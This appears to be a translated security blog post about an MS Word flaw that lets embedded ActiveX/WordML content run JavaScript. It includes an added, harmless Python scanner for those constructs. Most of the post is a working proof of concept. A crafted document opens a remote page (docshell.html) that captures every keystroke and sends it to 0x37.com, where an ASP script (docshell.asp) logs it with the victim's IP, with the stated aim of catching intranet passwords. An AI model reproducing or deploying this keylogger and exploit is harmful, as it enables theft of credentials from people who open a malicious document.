Some tests on MS Word JavaScript execution

Author: cosine
Source: 0x37 Security

Microsoft Word JavaScript execution. Original: /?l=bugtraq&m=121121432823704&w=2, discussed in the hi group. We can draw some conclusions:

1. Because the ActiveX inline data stream function is disabled once the Q313675 security patch is installed, it is not feasible to execute malicious code by directly creating ActiveX objects from JS. Take the following code:

<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write(&lt;script src=;&lt;/script&gt;)"></OBJECT>

The remote doc.js file loaded this way has limited capabilities. However, popping up a dialog box or opening a new window still works.

2. The hole is actually in the XML file. When HTML constructed as above is opened in Word and saved as XML, the data is converted to XML format. However, the result contains <w:ocx w:data="......" />, and this is where the problem occurs. Files with the extensions .doc, .rtf and .xml are all opened by Word by default. Word then acts as the interpreter: the data inside <w:ocx w:data="......" /> is interpreted and executed, which causes the JS to run.

3. AE24FDAE-03C6-11D1-8B76-0080C744F389 is the classid of mshtml.dll. It is still worthwhile to identify the cause of the vulnerability and fix it.
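
A defender-side check for the two constructs described in points 1 to 3, as an added example that is not part of the original post: it flags an <OBJECT> carrying the classid above together with a javascript: url parameter, and any <w:ocx> element that carries w:data. The function names, rule names and sample strings are constructed for illustration, and the contents of w:data are treated as opaque.

```python
import html
import re

# classid quoted on the page (the page attributes it to mshtml.dll)
MSHTML_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"

# Tag body that tolerates '>' inside quoted attribute values.
BODY = r"""((?:"[^"]*"|'[^']*'|[^>"'])*)"""
OBJECT_RE = re.compile(r"<object\b" + BODY + r">(.*?)</object\s*>", re.I | re.S)
PARAM_RE = re.compile(r"<param\b" + BODY + r">", re.I)
OCX_RE = re.compile(r"<w:ocx\b" + BODY + r">", re.I)
ATTR_RE = re.compile(r"""([\w:.-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def attrs(tag_body):
    """Return a dict of lower-cased attribute names to raw values."""
    return {n.lower(): dq or sq or bare
            for n, dq, sq, bare in ATTR_RE.findall(tag_body)}

def scan(text):
    """Return (rule, detail) findings for the two constructs the page describes."""
    findings = []
    for obj in OBJECT_RE.finditer(text):
        if MSHTML_CLSID not in obj.group(1).upper():
            continue
        for param in PARAM_RE.finditer(obj.group(2)):
            a = attrs(param.group(1))
            # Decode entities first so "&#106;avascript:" is still caught.
            value = html.unescape(a.get("value", "")).strip()
            if a.get("name", "").lower() == "url" and value.lower().startswith("javascript:"):
                findings.append(("object-javascript-url", value[:40]))
    for ocx in OCX_RE.finditer(text):
        data = attrs(ocx.group(1)).get("w:data")
        if data is not None:
            # w:data is treated as opaque; only its presence and size are reported.
            findings.append(("wordml-ocx-data", "%d chars" % len(data)))
    return findings

# Constructed samples (not taken from the page's PoC files).
SAMPLE_HTML = ('<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>'
               '<param name=url value="javascript:void(0)"></OBJECT>')
SAMPLE_XML = '<w:ocx w:data="QUJDRA==" />'
SAMPLE_CLEAN = ('<object classid="clsid:00000000-0000-0000-0000-000000000000">'
                '<param name="url" value="https://example.invalid/"></object>')

if __name__ == "__main__":
    for name, doc in [("html", SAMPLE_HTML), ("xml", SAMPLE_XML), ("clean", SAMPLE_CLEAN)]:
        print(name, scan(doc))
```

A hit on the second rule only says that an embedded control with data is present in a file Word will open; it is a triage signal, not proof that script is inside.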

Since this JS capability is limited, you can still have some fun with it, as mentioned here: http://www.0x37.com/post/15.html. The following PoC works this way: when the user opens doc.doc, the Word document we have maliciously constructed, it pops up the home page of the internal network (I used that for the experiment purely out of habit ......). We can then record the user's keystrokes on this page :). Maybe a password is caught directly (if other users are like me and habitually type the password straight into the Intranet page and press Enter ......).

The doc.html code is as follows:

<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:x=open(;setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.0x37.com/Project/poc/docshell.html';}}}catch(e){}},3000);void(1);"></OBJECT>

Follow /? Lw.bugtraq&m=123791432823704&w=2 to generate the doc.doc file (this is the evil document; change the name so that it is easy to open).

The remote docshell.html code is as follows:

<body bgcolor="#333333">
<div id="o"></div>
<input type=text id="x" style="width:0;height:0">
<script>
// Create the XMLHTTP object, falling back to ActiveX on older IE.
var _x = false;
if (window.XMLHttpRequest) {
    _x = new XMLHttpRequest();
} else if (window.ActiveXObject) {
    _x = new ActiveXObject("Msxml2.XMLHTTP");
    if (!_x) { _x = new ActiveXObject("Microsoft.XMLHTTP"); }
}
// Each key press is sent to docshell.asp as the tmp parameter.
document.onkeydown = function (e) {
    if (!e) e = window.event;
    try {
        tmp = (String.fromCharCode(e.which | e.keyCode));
        _3or7("GET", "http://www.0x37.com/Project/poc/docshell.asp?tmp=" + tmp, null);
    } catch (ex) {}
};
function _3or7(_m, _s, _) {
    _x.open(_m, _s, false);
    _x.send(_);
    return _x.responseText;
}
// Keep focus on the zero-size input so that key events arrive on this page.
setInterval(function () { try { document.getElementById('x').focus(); } catch (e) {} }, 100);
focus();
</script>

The remote docshell.asp code is as follows:

ip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If ip = "" Then
    ip = Request.ServerVariables("REMOTE_ADDR")
End If
tmp = Request.QueryString("tmp")
Response.Write(tmp)
filename = "docshell.txt"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(Server.MapPath(filename), 8, True)
file.Write(ip + ">" + tmp + Chr(13))
file.Close
Set file = Nothing
Set fso = Nothing

Then we can see the recorded result at http://www.0x37.com/Project/poc/docshell.txt :). Complete files: http://www.0x37.com/Project/poc/wordjs.rar. However, this keystroke recording is still flawed. I wanted to combine it with the method from http://www.0x37.com/post/15.html to construct more evil code, but it did not go smoothly ...... I will talk about that later :). Now let's wait for more information about the vulnerability.
